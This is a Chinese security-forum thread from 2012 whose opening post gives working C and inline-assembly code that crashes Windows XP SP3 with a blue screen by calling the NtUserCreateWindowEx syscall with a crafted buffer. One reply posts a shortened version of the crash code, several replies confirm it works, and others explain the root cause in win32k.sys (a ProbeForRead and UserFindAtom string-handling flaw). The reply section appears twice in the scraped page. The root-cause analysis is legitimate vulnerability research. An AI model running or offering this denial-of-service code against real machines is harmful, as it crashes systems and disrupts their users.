[原创]Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability

发表于: 2012-5-2 12:41 14456

[原创]Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability

dge

2012-5-2 12:41

14456

////////////////////////////////////////////////////////////////////////////
//
// Title: Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
// Vendor: www.microsoft.com
// Vulnerable: Windows xp sp3(full patch)
//
/////////////////////////////////////////////////////////////////////////////

#include <Windows.h>
#include <stdio.h>

void NtUserCreateWindowEx(HANDLE d1,int d2,int d3)
{
_asm{
         xor eax,eax
push eax
push eax
        push eax
        push eax
        push eax
        push eax
        push eax
push eax
push eax
        push eax
        push eax
        push eax
        push d3
        push d2
push d1
push eax
mov eax,0x1157
mov edx,7FFE0300h
call  dword ptr[edx]
ret 0x3c
}
}
void main()
{
UINT i=0;
UINT c[]={
0x00000000,0x28001500,0xff7c98cc,0x23ffffff
,0x167c98cc,0x007c98fb,0x02001500,0x78010000
,0x00000000,0x00001500,0x00000000,0x00001500
,0x00000000,0x00001500,0x00000000,0x00000000
,0x00000000,0x00000000,0x34000000,0x3cc00000
,0x5c0007fb,0x617c92f6,0x347c92f6,0x00c00000
,0x00000000,0x18000000,0x000007fb,0xf8000000
,0x200007fd,0x347c92e9,0x02c00000,0x4c000000
};
HWND _wnd = CreateWindowEx(WS_EX_TOPMOST,
"magic",
"magic",
WS_POPUP,
100,
100,
100,
100,
0,
0,
GetModuleHandle( 0 ),
0);
NtUserCreateWindowEx(_wnd,0x26,(UINT)c);
}

BTW:just for fun

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

#调试逆向

收藏・11

免费・6

支持

最新回复 (23)
cxthl 雪币： 249 活跃值： (71) 能力值： ( LV7，RANK：100 ) 在线值：发帖 14 回帖 120 粉丝 0 关注私信	cxthl 2 2 楼亲测可行,膜拜! 2012-5-2 12:58 0
hellok 雪币： 227 活跃值： (120) 能力值： ( LV10，RANK：160 ) 在线值：发帖 10 回帖 83 粉丝 4 关注私信	hellok 3 3 楼 XPSP3 成功BSOD。碉堡了哦 2012-5-2 15:34 0
大嘴呀呀雪币： 195 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 76 粉丝 0 关注私信	大嘴呀呀 4 楼那位神人讲讲原理啊~ 我电脑运行直接重启了！ 2012-5-2 16:43 0
goddkiller 雪币： 485 活跃值： (78) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 1 关注私信	goddkiller 5 楼大略看了下BSOD的信息调用RtlpGetIntegerAtom时执行到下面的这一句 if (*Name != L'#') { //执行到这里，因为Name指向NULL，再取它的值用比较就BSOD了 Name这个参数没有做任何检查 2012-5-2 18:02 0
jasonnbfan 雪币： 949 活跃值： (18) 能力值： ( LV9，RANK：330 ) 在线值：发帖 60 回帖 265 粉丝 2 关注私信	jasonnbfan 8 6 楼没敢试...，顶一下。 2012-5-2 18:57 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 7 楼 Name检查过了，没检查好。 ………………………… UINT c[]={ 0x00000000,0x28001500,0xff7c98cc,0x23ffffff ………………………… Name没指向NULL，而是指向0xff7c98cc，你把0xff7c98cc改为0x80000000也能蓝精简一下： #include <Windows.h> void _declspec(naked) NtUserCreateWindowEx(ULONG d1,...) { __asm { mov eax,0x1157 mov edx,7FFE0300h call dword ptr[edx] ret 0x3c } } UINT c[]={ 0, 0, 0x80000000 }; void main() { LoadLibraryA("user32.dll"); NtUserCreateWindowEx(0,0,c,0,0,0,0,0,0,0,0,0,0); } 2012-5-2 18:59 0
goddkiller 雪币： 485 活跃值： (78) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 1 关注私信	goddkiller 8 楼感谢LS指正，我可能没表达清楚~~~ 原意是想说 f0754b34 805d4604 ff7c98cc f0754b58 00400000 nt!RtlpGetIntegerAtom+0x35 这里的为空的 kd> du ff7c98cc ff7c98cc "????????????????????????????????" ff7c990c "????????????????????????????????" 2012-5-2 19:36 0
cxthl 雪币： 249 活跃值： (71) 能力值： ( LV7，RANK：100 ) 在线值：发帖 14 回帖 120 粉丝 0 关注私信	cxthl 2 9 楼 LZ是看反汇编代码看出来的吗? 2012-5-2 23:02 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 10 楼顶楼上的问题 2012-5-3 08:46 0
kangcin 雪币： 602 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 482 粉丝 0 关注私信	kangcin 11 楼蓝?.............. 2012-5-3 08:57 0
dayang 雪币： 220 活跃值： (721) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 12 楼 win2003 测试无结果！ 2012-5-3 09:22 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 13 楼不是。关于漏洞挖掘的资料已经很完善了，虽然具体的东西不一样，但本质都是一样的，灵活运用。 http://sebug.net/paper/Meeting-Documents/syscanhk/AttackingAV_syscan08hk.ppt http://www.slideshare.net/michelemanzotti/gdi-font-fuzzing-in-windows-kernel-for-fun 2012-5-3 09:35 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 14 楼标题明明写的是XP啊 2012-5-3 09:38 0
大嘴呀呀雪币： 195 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 76 粉丝 0 关注私信	大嘴呀呀 15 楼还是看不太懂 2012-5-3 09:50 0
雪yaojun 雪币： 120 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 593 粉丝 0 关注私信	雪yaojun 16 楼测试去。。。。。 2012-5-3 12:01 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 17 楼 2008也有同样问题不？ 2012-5-3 12:30 0
dEARMoON 雪币： 106 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 95 粉丝 0 关注私信	dEARMoON 18 楼可惜MS不要XP啊,要不还能换个表扬来安抚一下小内心,哈哈支持lz. 2012-5-3 16:53 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 19 楼漏洞挖掘？向楼主学习。 2012-5-3 23:38 0
hheno 雪币： 19 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 26 粉丝 0 关注私信	hheno 20 楼体验下子。待会儿汇报。。。 2012-5-4 15:01 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 21 楼膜拜dge大黑阔…… 2012-5-5 12:22 0
gamefox 雪币： 224 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 58 粉丝 0 关注私信	gamefox 22 楼看错了，我晕 2012-5-5 18:30 0
zzzevazzz 雪币： 106 活跃值： (35) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	zzzevazzz 23 楼微软也会掉进ProbeForRead陷阱啊，呵呵。当UNICODE_STRING.Length为0的时候，即使Buffer指向内核地址也可以通过Probe。本来这样的字符串传递给其他UNICODE_STRING处理函数是不会有问题的，但偏偏NtUserCreateWindowsEx直接调用UserFindAtom，而这个函数只处理NULL结尾字符串，而不是UNICODE_STRING。 2012-5-5 18:40 0
blackwhite 雪币： 411 活跃值： (247) 能力值： ( LV4，RANK：50 ) 在线值：发帖 31 回帖 247 粉丝 3 关注私信	blackwhite 1 24 楼楼上的zzzevazzz看起好眼熟...不知道是不是N年前那个 2012-5-6 21:38 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

dge

发帖

251

回帖

290

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (23)
cxthl 雪币： 249 活跃值： (71) 能力值： ( LV7，RANK：100 ) 在线值：发帖 14 回帖 120 粉丝 0 关注私信	cxthl 2 2 楼亲测可行,膜拜! 2012-5-2 12:58 0
hellok 雪币： 227 活跃值： (120) 能力值： ( LV10，RANK：160 ) 在线值：发帖 10 回帖 83 粉丝 4 关注私信	hellok 3 3 楼 XPSP3 成功BSOD。碉堡了哦 2012-5-2 15:34 0
大嘴呀呀雪币： 195 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 76 粉丝 0 关注私信	大嘴呀呀 4 楼那位神人讲讲原理啊~ 我电脑运行直接重启了！ 2012-5-2 16:43 0
goddkiller 雪币： 485 活跃值： (78) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 1 关注私信	goddkiller 5 楼大略看了下BSOD的信息调用RtlpGetIntegerAtom时执行到下面的这一句 if (*Name != L'#') { //执行到这里，因为Name指向NULL，再取它的值用比较就BSOD了 Name这个参数没有做任何检查 2012-5-2 18:02 0
jasonnbfan 雪币： 949 活跃值： (18) 能力值： ( LV9，RANK：330 ) 在线值：发帖 60 回帖 265 粉丝 2 关注私信	jasonnbfan 8 6 楼没敢试...，顶一下。 2012-5-2 18:57 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 6 关注私信	KiDebug 4 7 楼 Name检查过了，没检查好。 ………………………… UINT c[]={ 0x00000000,0x28001500,0xff7c98cc,0x23ffffff ………………………… Name没指向NULL，而是指向0xff7c98cc，你把0xff7c98cc改为0x80000000也能蓝精简一下： #include <Windows.h> void _declspec(naked) NtUserCreateWindowEx(ULONG d1,...) { __asm { mov eax,0x1157 mov edx,7FFE0300h call dword ptr[edx] ret 0x3c } } UINT c[]={ 0, 0, 0x80000000 }; void main() { LoadLibraryA("user32.dll"); NtUserCreateWindowEx(0,0,c,0,0,0,0,0,0,0,0,0,0); } 2012-5-2 18:59 0
goddkiller 雪币： 485 活跃值： (78) 能力值： ( LV4，RANK：40 ) 在线值：发帖 9 回帖 346 粉丝 1 关注私信	goddkiller 8 楼感谢LS指正，我可能没表达清楚~~~ 原意是想说 f0754b34 805d4604 ff7c98cc f0754b58 00400000 nt!RtlpGetIntegerAtom+0x35 这里的为空的 kd> du ff7c98cc ff7c98cc "????????????????????????????????" ff7c990c "????????????????????????????????" 2012-5-2 19:36 0
cxthl 雪币： 249 活跃值： (71) 能力值： ( LV7，RANK：100 ) 在线值：发帖 14 回帖 120 粉丝 0 关注私信	cxthl 2 9 楼 LZ是看反汇编代码看出来的吗? 2012-5-2 23:02 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 10 楼顶楼上的问题 2012-5-3 08:46 0
kangcin 雪币： 602 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 482 粉丝 0 关注私信	kangcin 11 楼蓝?.............. 2012-5-3 08:57 0
dayang 雪币： 220 活跃值： (721) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 935 粉丝 1 关注私信	dayang 12 楼 win2003 测试无结果！ 2012-5-3 09:22 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 13 楼不是。关于漏洞挖掘的资料已经很完善了，虽然具体的东西不一样，但本质都是一样的，灵活运用。 http://sebug.net/paper/Meeting-Documents/syscanhk/AttackingAV_syscan08hk.ppt http://www.slideshare.net/michelemanzotti/gdi-font-fuzzing-in-windows-kernel-for-fun 2012-5-3 09:35 0
dge 雪币： 622 活跃值： (65) 能力值： ( LV13，RANK：290 ) 在线值：发帖 11 回帖 251 粉丝 3 关注私信	dge 6 14 楼标题明明写的是XP啊 2012-5-3 09:38 0
大嘴呀呀雪币： 195 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 76 粉丝 0 关注私信	大嘴呀呀 15 楼还是看不太懂 2012-5-3 09:50 0
雪yaojun 雪币： 120 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 593 粉丝 0 关注私信	雪yaojun 16 楼测试去。。。。。 2012-5-3 12:01 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 17 楼 2008也有同样问题不？ 2012-5-3 12:30 0
dEARMoON 雪币： 106 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 95 粉丝 0 关注私信	dEARMoON 18 楼可惜MS不要XP啊,要不还能换个表扬来安抚一下小内心,哈哈支持lz. 2012-5-3 16:53 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 19 楼漏洞挖掘？向楼主学习。 2012-5-3 23:38 0
hheno 雪币： 19 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 26 粉丝 0 关注私信	hheno 20 楼体验下子。待会儿汇报。。。 2012-5-4 15:01 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 259 关注私信	riusksk 41 21 楼膜拜dge大黑阔…… 2012-5-5 12:22 0
gamefox 雪币： 224 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 58 粉丝 0 关注私信	gamefox 22 楼看错了，我晕 2012-5-5 18:30 0
zzzevazzz 雪币： 106 活跃值： (35) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	zzzevazzz 23 楼微软也会掉进ProbeForRead陷阱啊，呵呵。当UNICODE_STRING.Length为0的时候，即使Buffer指向内核地址也可以通过Probe。本来这样的字符串传递给其他UNICODE_STRING处理函数是不会有问题的，但偏偏NtUserCreateWindowsEx直接调用UserFindAtom，而这个函数只处理NULL结尾字符串，而不是UNICODE_STRING。 2012-5-5 18:40 0
blackwhite 雪币： 411 活跃值： (247) 能力值： ( LV4，RANK：50 ) 在线值：发帖 31 回帖 247 粉丝 3 关注私信	blackwhite 1 24 楼楼上的zzzevazzz看起好眼熟...不知道是不是N年前那个 2012-5-6 21:38 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复